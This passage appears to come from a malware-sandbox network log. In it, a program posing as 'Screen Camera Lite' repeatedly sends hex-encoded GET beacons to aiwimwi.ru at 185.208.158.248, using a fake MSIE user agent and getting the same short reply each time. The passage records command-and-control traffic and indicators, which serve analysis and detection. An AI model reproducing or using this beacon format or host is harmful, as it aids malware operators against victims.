                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.449890185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:17.309139013 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:18.017544985 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.449896185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:18.137320042 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:18.834309101 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:18.944262981 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:19.197088957 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:19.303772926 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:19.540467024 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.449904185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:19.668858051 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:20.386735916 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.449908185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:20.512630939 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:21.217633963 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.449911185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:21.340641022 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:22.029522896 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.449915185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:22.153028965 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:22.839972973 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.449920185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:23.091661930 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:23.794152021 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.449926185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:23.918581009 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:24.614551067 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.449933185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:24.731417894 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:25.437227964 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.449940185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:25.562611103 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:26.264242887 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.449946185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:26.387425900 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:27.067792892 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.449952185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:27.184278965 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:27.896632910 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:28.006807089 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:28.251683950 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.449961185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:28.387351036 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:29.067962885 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:29.178529978 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:29.419015884 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.449969185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:29.544054031 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:30.236002922 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.449975185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:30.362420082 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:31.050906897 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.449982185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:31.168430090 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:31.860143900 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.449989185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:31.981496096 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:32.690474987 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.449996185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:32.809371948 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:33.492124081 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:33.600688934 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:33.835850000 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.450003185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:33.965755939 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:34.678936958 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.450009185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:34.793704987 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:35.476301908 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:35.584795952 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
